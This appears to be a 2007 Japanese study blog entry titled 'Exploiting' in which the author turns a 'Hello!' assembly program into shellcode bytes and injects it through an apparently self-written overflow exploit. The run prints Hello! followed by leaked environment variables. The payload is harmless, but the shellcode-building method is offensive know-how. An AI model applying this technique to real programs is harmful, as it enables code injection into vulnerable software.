2007-09-01 Exploiting MACは何系列?独立? ーーーーーー .code32 .data msg: .ascii "Hello!" .global main main: movl $4, %eax movl $0, %ebx movl $msg, %ecx movl $6, %edx int $0x80 movl $1, %eax int $0x80 ret ----- ----- .global main main: jmp ONE TWO: popl %ecx movb $0x4, %al xorl %ebx, %ebx movb $0x6, %dl int $0x80 xorl %eax, %eax inc %eax int $0x80 ret ONE: call TWO .string "Hello!" ----- これをコンパイル gcc hello.s 16進表示 defolos@glazheim:~$ objdump -d a.out a.out: ファイル形式 elf32-i386 セクション .init の逆アセンブル: 08048254 <_init>: 8048254: 55 push %ebp 8048255: 89 e5 mov %esp,%ebp 8048257: 83 ec 08 sub $0x8,%esp 804825a: e8 55 00 00 00 call 80482b4 804825f: e8 bc 00 00 00 call 8048320 8048264: e8 d7 01 00 00 call 8048440 <__do_global_ctors_aux> 8048269: c9 leave 804826a: c3 ret セクション .plt の逆アセンブル: 0804826c <.plt>: 804826c: ff 35 84 95 04 08 pushl 0x8049584 8048272: ff 25 88 95 04 08 jmp *0x8049588 8048278: 00 00 add %al,(%eax) 804827a: 00 00 add %al,(%eax) 804827c: ff 25 8c 95 04 08 jmp *0x804958c 8048282: 68 00 00 00 00 push $0x0 8048287: e9 e0 ff ff ff jmp 804826c <_init+0x18> セクション .text の逆アセンブル: 08048290 <_start>: 8048290: 31 ed xor %ebp,%ebp 8048292: 5e pop %esi 8048293: 89 e1 mov %esp,%ecx 8048295: 83 e4 f0 and $0xfffffff0,%esp 8048298: 50 push %eax 8048299: 54 push %esp 804829a: 52 push %edx 804829b: 68 e0 83 04 08 push $0x80483e0 80482a0: 68 80 83 04 08 push $0x8048380 80482a5: 51 push %ecx 80482a6: 56 push %esi 80482a7: 68 54 83 04 08 push $0x8048354 80482ac: e8 cb ff ff ff call 804827c <_init+0x28> 80482b1: f4 hlt 80482b2: 90 nop 80482b3: 90 nop 080482b4 : 80482b4: 55 push %ebp 80482b5: 89 e5 mov %esp,%ebp 80482b7: 53 push %ebx 80482b8: e8 00 00 00 00 call 80482bd 80482bd: 5b pop %ebx 80482be: 81 c3 c3 12 00 00 add $0x12c3,%ebx 80482c4: 50 push %eax 80482c5: 8b 83 10 00 00 00 mov 0x10(%ebx),%eax 80482cb: 85 c0 test %eax,%eax 80482cd: 74 02 je 80482d1 80482cf: ff d0 call *%eax 80482d1: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 80482d4: c9 leave 80482d5: c3 ret 80482d6: 90 nop 80482d7: 90 nop 80482d8: 90 nop 80482d9: 90 nop 80482da: 90 nop 80482db: 90 nop 80482dc: 90 nop 80482dd: 90 nop 80482de: 90 nop 80482df: 90 nop 080482e0 <__do_global_dtors_aux>: 80482e0: 55 push %ebp 80482e1: 89 e5 mov %esp,%ebp 80482e3: 83 ec 08 sub $0x8,%esp 80482e6: 80 3d 94 95 04 08 00 cmpb $0x0,0x8049594 80482ed: 75 2d jne 804831c <__do_global_dtors_aux+0x3c> 80482ef: a1 9c 94 04 08 mov 0x804949c,%eax 80482f4: 8b 10 mov (%eax),%edx 80482f6: 85 d2 test %edx,%edx 80482f8: 74 1b je 8048315 <__do_global_dtors_aux+0x35> 80482fa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 8048300: 83 c0 04 add $0x4,%eax 8048303: a3 9c 94 04 08 mov %eax,0x804949c 8048308: ff d2 call *%edx 804830a: a1 9c 94 04 08 mov 0x804949c,%eax 804830f: 8b 10 mov (%eax),%edx 8048311: 85 d2 test %edx,%edx 8048313: 75 eb jne 8048300 <__do_global_dtors_aux+0x20> 8048315: c6 05 94 95 04 08 01 movb $0x1,0x8049594 804831c: c9 leave 804831d: c3 ret 804831e: 89 f6 mov %esi,%esi 08048320 : 8048320: 55 push %ebp 8048321: 89 e5 mov %esp,%ebp 8048323: 83 ec 08 sub $0x8,%esp 8048326: a1 7c 95 04 08 mov 0x804957c,%eax 804832b: 85 c0 test %eax,%eax 804832d: 74 21 je 8048350 804832f: b8 00 00 00 00 mov $0x0,%eax 8048334: 85 c0 test %eax,%eax 8048336: 74 18 je 8048350 8048338: c7 04 24 7c 95 04 08 movl $0x804957c,(%esp) 804833f: e8 bc 7c fb f7 call 0 <_init-0x8048254> 8048344: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 804834a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 8048350: 89 ec mov %ebp,%esp 8048352: 5d pop %ebp 8048353: c3 ret 08048354
: 8048354: eb 0f jmp 8048365 08048356 : 8048356: 59 pop %ecx 8048357: b0 04 mov $0x4,%al 8048359: 31 db xor %ebx,%ebx 804835b: b2 06 mov $0x6,%dl 804835d: cd 80 int $0x80 804835f: 31 c0 xor %eax,%eax 8048361: 40 inc %eax 8048362: cd 80 int $0x80 8048364: c3 ret 08048365 : 8048365: e8 ec ff ff ff call 8048356 804836a: 48 dec %eax 804836b: 65 gs 804836c: 6c insb (%dx),%es:(%edi) 804836d: 6c insb (%dx),%es:(%edi) 804836e: 6f outsl %ds:(%esi),(%dx) 804836f: 21 00 and %eax,(%eax) 8048371: 90 nop 8048372: 90 nop 8048373: 90 nop 8048374: 90 nop 8048375: 90 nop 8048376: 90 nop 8048377: 90 nop 8048378: 90 nop 8048379: 90 nop 804837a: 90 nop 804837b: 90 nop 804837c: 90 nop 804837d: 90 nop 804837e: 90 nop 804837f: 90 nop 08048380 <__libc_csu_init>: 8048380: 55 push %ebp 8048381: 89 e5 mov %esp,%ebp 8048383: 57 push %edi 8048384: 56 push %esi 8048385: 31 f6 xor %esi,%esi 8048387: 53 push %ebx 8048388: 83 ec 0c sub $0xc,%esp 804838b: e8 a0 00 00 00 call 8048430 <__i686.get_pc_thunk.bx> 8048390: 81 c3 f0 11 00 00 add $0x11f0,%ebx 8048396: e8 b9 fe ff ff call 8048254 <_init> 804839b: 8d 93 14 ff ff ff lea 0xffffff14(%ebx),%edx 80483a1: 8d 83 14 ff ff ff lea 0xffffff14(%ebx),%eax 80483a7: 29 c2 sub %eax,%edx 80483a9: c1 fa 02 sar $0x2,%edx 80483ac: 39 d6 cmp %edx,%esi 80483ae: 73 1c jae 80483cc <__libc_csu_init+0x4c> 80483b0: 89 d7 mov %edx,%edi 80483b2: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi 80483b9: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi 80483c0: ff 94 b3 14 ff ff ff call *0xffffff14(%ebx,%esi,4) 80483c7: 46 inc %esi 80483c8: 39 fe cmp %edi,%esi 80483ca: 72 f4 jb 80483c0 <__libc_csu_init+0x40> 80483cc: 83 c4 0c add $0xc,%esp 80483cf: 5b pop %ebx 80483d0: 5e pop %esi 80483d1: 5f pop %edi 80483d2: 5d pop %ebp 80483d3: c3 ret 80483d4: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80483da: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 080483e0 <__libc_csu_fini>: 80483e0: 55 push %ebp 80483e1: 89 e5 mov %esp,%ebp 80483e3: 83 ec 08 sub $0x8,%esp 80483e6: 89 1c 24 mov %ebx,(%esp) 80483e9: e8 42 00 00 00 call 8048430 <__i686.get_pc_thunk.bx> 80483ee: 81 c3 92 11 00 00 add $0x1192,%ebx 80483f4: 89 74 24 04 mov %esi,0x4(%esp) 80483f8: 8d 83 14 ff ff ff lea 0xffffff14(%ebx),%eax 80483fe: 8d 93 14 ff ff ff lea 0xffffff14(%ebx),%edx 8048404: 29 d0 sub %edx,%eax 8048406: c1 f8 02 sar $0x2,%eax 8048409: 85 c0 test %eax,%eax 804840b: 8d 70 ff lea 0xffffffff(%eax),%esi 804840e: 75 10 jne 8048420 <__libc_csu_fini+0x40> 8048410: e8 5b 00 00 00 call 8048470 <_fini> 8048415: 8b 1c 24 mov (%esp),%ebx 8048418: 8b 74 24 04 mov 0x4(%esp),%esi 804841c: 89 ec mov %ebp,%esp 804841e: 5d pop %ebp 804841f: c3 ret 8048420: ff 94 b3 14 ff ff ff call *0xffffff14(%ebx,%esi,4) 8048427: 89 f0 mov %esi,%eax 8048429: 4e dec %esi 804842a: 85 c0 test %eax,%eax 804842c: 75 f2 jne 8048420 <__libc_csu_fini+0x40> 804842e: eb e0 jmp 8048410 <__libc_csu_fini+0x30> 08048430 <__i686.get_pc_thunk.bx>: 8048430: 8b 1c 24 mov (%esp),%ebx 8048433: c3 ret 8048434: 90 nop 8048435: 90 nop 8048436: 90 nop 8048437: 90 nop 8048438: 90 nop 8048439: 90 nop 804843a: 90 nop 804843b: 90 nop 804843c: 90 nop 804843d: 90 nop 804843e: 90 nop 804843f: 90 nop 08048440 <__do_global_ctors_aux>: 8048440: 55 push %ebp 8048441: 89 e5 mov %esp,%ebp 8048443: 53 push %ebx 8048444: 83 ec 04 sub $0x4,%esp 8048447: bb 6c 95 04 08 mov $0x804956c,%ebx 804844c: a1 6c 95 04 08 mov 0x804956c,%eax 8048451: 83 f8 ff cmp $0xffffffff,%eax 8048454: 74 16 je 804846c <__do_global_ctors_aux+0x2c> 8048456: 8d 76 00 lea 0x0(%esi),%esi 8048459: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi 8048460: 83 eb 04 sub $0x4,%ebx 8048463: ff d0 call *%eax 8048465: 8b 03 mov (%ebx),%eax 8048467: 83 f8 ff cmp $0xffffffff,%eax 804846a: 75 f4 jne 8048460 <__do_global_ctors_aux+0x20> 804846c: 58 pop %eax 804846d: 5b pop %ebx 804846e: 5d pop %ebp 804846f: c3 ret セクション .fini の逆アセンブル: 08048470 <_fini>: 8048470: 55 push %ebp 8048471: 89 e5 mov %esp,%ebp 8048473: 53 push %ebx 8048474: e8 00 00 00 00 call 8048479 <_fini+0x9> 8048479: 5b pop %ebx 804847a: 81 c3 07 11 00 00 add $0x1107,%ebx 8048480: 52 push %edx 8048481: e8 5a fe ff ff call 80482e0 <__do_global_dtors_aux> 8048486: 8b 5d fc mov 0xfffffffc(%ebp),%ebx 8048489: c9 leave 804848a: c3 ret defolos@glazheim:~$ 必要なのはmainのところから90が連発する所までの間 08048354
: 8048354: eb 0f jmp 8048365 08048356 : 8048356: 59 pop %ecx 8048357: b0 04 mov $0x4,%al 8048359: 31 db xor %ebx,%ebx 804835b: b2 06 mov $0x6,%dl 804835d: cd 80 int $0x80 804835f: 31 c0 xor %eax,%eax 8048361: 40 inc %eax 8048362: cd 80 int $0x80 8048364: c3 ret 08048365 : 8048365: e8 ec ff ff ff call 8048356 804836a: 48 dec %eax 804836b: 65 gs 804836c: 6c insb (%dx),%es:(%edi) 804836d: 6c insb (%dx),%es:(%edi) 804836e: 6f outsl %ds:(%esi),(%dx) 804836f: 21 00 and %eax,(%eax) 8048371: 90 nop 8048372: 90 nop 8048373: 90 nop 8048374: 90 nop 8048375: 90 nop いらない部分を消す eb 0f 59 b0 04 31 db b2 06 cd 80 31 c0 40 cd 80 c3 e8 ec ff ff ff 48 65 6c 6c 6f 21 これを挿入ベクター生成プログラムにセットする "\xeb\x0f\x59\xb0\x04\x31\xdb\xb2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xc3\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c\x6f\x21" 実行するとヘローの他に defolos@glazheim:~$ ./exploit.exe Hello!8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffff\uffff8\uffff\uffffSSH_AGENT_PID=3140TERM=xtermDESKTOP_STARTUP_ID=SHELL=/bin/bashJLESSCHARSET=japanese-eucGTK_RC_FILES=/etc/gtk/gtkrc:/home/defolos/.gtkrc-1.2-gnome2WINDOWID=37748805USER=defolosLS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.ogg=01;35:*.mp3=01;35:*.wav=01;35:GNOME_KEYRING_SOCKET=/tmp/keyring-l5KwAs/socketSSH_AUTH_SOCK=/tmp/ssh-fBcwvc3092/agent.3092SESSION_MANAGER=local/glazheim:/tmp/.ICE-unix/3092USERNAME=defolosPAGER=lvPATH=/home/defolos/bin:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/gamesDESKTOP_SESSION=defaultGDM_XSERVER_LOCATION=localPWD=/home/defolosXMODIFIERS=@im=kinput2EDITOR=viLANG=ja_JP.eucJPGDMSESSION=defaultSHLVL=1HOME=/home/defolosLANGUAGE=ja_JP:ja:en_GB:enGNOME_DESKTOP_SESSION_ID=DefaultLV=-OejLESS=-MLOGNAME=defolosLESSOPEN=| /usr/bin/lesspipe '%s'DISPLAY=:0.0LESSCLOSE=/usr/bin/lesspipe '%s' '%s'COLORTERM=gnome-terminalXAUTHORITY=/home/defolos/.Xauthority_=./exdefolos@glazheim:~$ ■考察 もっと時間に余裕を持たせるべき unistd.hの場所が変わっているあるいは、そもそも存在しない